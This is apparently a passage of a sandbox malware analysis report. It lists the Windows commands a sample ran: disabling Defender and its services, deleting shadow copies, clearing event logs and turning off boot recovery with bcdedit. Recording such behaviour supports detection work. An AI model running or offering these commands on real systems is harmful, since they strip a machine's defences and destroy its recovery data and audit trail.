  C:\Windows\SYSTEM32\sc.exe | cmd: sc.exe config "SDRSVC" start= disabled | PID:964
  C:\Windows\SYSTEM32\sc.exe | cmd: sc.exe config "SstpSvc" start= disabled | PID:1156
  C:\Windows\SYSTEM32\sc.exe | cmd: sc.exe config "UI0Detect" start= disabled | PID:1468
  C:\Windows\SYSTEM32\sc.exe | cmd: sc.exe config "vmicvss" start= disabled | PID:2388
  C:\Windows\SYSTEM32\sc.exe | cmd: sc.exe config "VSS" start= disabled | PID:1968
  C:\Windows\SYSTEM32\sc.exe | cmd: sc.exe config "wbengine" start= disabled | PID:1944
  C:\Windows\SYSTEM32\sc.exe | cmd: sc.exe config "WebClient" start= disabled | PID:2440
  C:\Windows\SYSTEM32\sc.exe | cmd: sc.exe config "UnistoreSvc_12a0b" start= disabled | PID:1868
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f | PID:2404
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | PID:3656
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | PID:1052
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | PID:3368
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | PID:3152
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | PID:3748
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | PID:2004
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | PID:696
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f | PID:3772
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f | PID:500
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f | PID:652
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f | PID:1000
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f | PID:60
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f | PID:3280
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f | PID:2216
  C:\Windows\SYSTEM32\reg.exe | cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f | PID:3384
  C:\Windows\SYSTEM32\schtasks.exe | cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable | PID:2752
  C:\Windows\SYSTEM32\schtasks.exe | cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable | PID:604
  C:\Windows\SYSTEM32\schtasks.exe | cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable | PID:1356
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1036
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:3940
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2508
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1316
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1448
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1672 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2232 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3224 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2860
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1776
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2760
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3744
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3172 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:868
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3788 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3064 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1960 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4028 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4064 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1228 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:720 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2200 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1444
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1116 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1552
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1780 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3796
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:700
Network
MITRE ATT&CK Enterprise v6
Downloads